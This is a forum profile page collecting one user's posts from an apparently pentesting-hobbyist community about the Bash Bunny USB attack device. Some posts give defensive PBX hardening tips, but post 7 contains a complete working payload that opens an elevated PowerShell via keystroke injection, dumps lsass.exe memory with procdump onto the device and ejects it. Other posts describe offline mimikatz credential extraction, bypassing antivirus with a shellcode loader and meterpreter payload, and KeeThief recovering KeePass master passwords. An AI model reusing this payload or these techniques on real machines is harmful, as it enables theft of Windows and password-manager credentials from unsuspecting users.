Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

  • Days Won


Recent Profile Visitors

2,098 profile views

rottingsun's Achievements


Newbie (1/14)

  1. There's a few basic strategies, some hardware based and some software based. Normally a special type of firewall called a session border controller is placed in front of the PBX. They're designed to address issues like toll fraud. Other things can be done too though. General PBX hardening best practices should be enforced, like strong SIP account passwords, limiting SIP sessions to only your authorized private subnets, not allowing outgoing international calling, not allowing outgoing calling to offshore US territories, turning off call transfer feature codes for incoming calls, not exposing your PBX directly to a public IP, etc. On top of that, you must monitor logs regularly. Here's a presentation that's FreePBX based but includes general best practices. https://player.vimeo.com/video/130328541
  2. With mimikatz and all the derivatives being flagged more and more these days, I find it more effective to take a memdump of lsass using procdump, then running it through mimi in minidump mode.
  3. So I ended up having a major issue with a VMware host at work and missed the live. Anyone care to share their impressions of the PS?
  4. Just a few more hours until the new eagles land.
  5. Any further details on the device and what it is capable of, or do we have to wait until tomorrow?
  6. Oughta been interesting. I'll be watching the live stream intently. This blog refers to it as a "programmable MITM device". https://www.doyler.net/security-not-included/def-con-25-bsideslv-2017 I also saw someone on Twitter describe it as "an online tap with payload capability, like the bash bunny".
  7. Here's my working code for running an executable (procdump) from the bunny within powershell and the saving the dump file to the bunny, given the user has local admin privs to begin with. Note that in the line that runs procdump, the & character occurs at the front of the command. It is a special powershell operator that evaluates the text following the & character as a command and not a powershell object. LED Y 100 source bunny_helpers.sh LED B 100 ATTACKMODE HID STORAGE Q GUI r Q DELAY 500 Q STRING powershell Start-Process powershell -Verb runAs Q ENTER Q DELAY 1000 Q ALT y Q DELAY 500 Q STRING \$bunny\=\(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\) Q DELAY 500 Q ENTER Q DELAY 500 Q STRING \& \$bunny\\payloads\\$SWITCH_POSITION\\Procdump\\procdump.exe -accepteula -ma lsass.exe \$bunny\\loot\\takeadump\\lsd.dmp Q ENTER Q DELAY 200 Q STRING \$driveEject\=New-Object -comObject Shell.Application Q ENTER Q DELAY 200 Q STRING \$driveEject.Namespace\(17\).ParseName\(\$bunny\).InvokeVerb\(\"Eject\"\) Q ENTER Q DELAY 200 Q STRING exit Q ENTER LED FINISH
  8. Perhaps LLMNR, NETBIOS, and WPAD are all disabled on the target? Far fetched of it's a home PC i know but.
  9. Nice. I got mine in recently. My first payload was running procdump from the bunny and then saving the dump file onto the bunny for later mimikatz analysis.
  10. A technique I've been experimenting with that gets past both Win Defender and Vipre AV currently is a custom shellcode loader, as per http://www.attactics.org/2016/03/bypassing-antivirus-with-10-lines-of.html. I've used the loader almost verbatim with a shikata_na_gai meterpreter rev_tcp payload to successfully bypass both.
  11. The latest Empire stagers actually have a bunny target.
  12. Very nice. I actually never thought of the bunny/ducky in the context of legitimate uses. I got a bunny personally so I can demo to management what happens if I grant a non-IT user local admin perms like I sometimes get asked.
  13. I believe RDP locks the session of the currently logged in user, which would be a dead give away. Would this payload be more in the context of a sneak attack while a user is away? Not knocking it - just wondering the intent.
  14. KeePass is really awesome. Just make sure an attacker using Empire doesn't get a shell on your system. It includes a module called KeeThief which can display your master password in cleartext.
  15. I ordered a bunny late last night. Looking forward to trying out this payload and maybe adding in the concepts I mentioned.
  • Create New...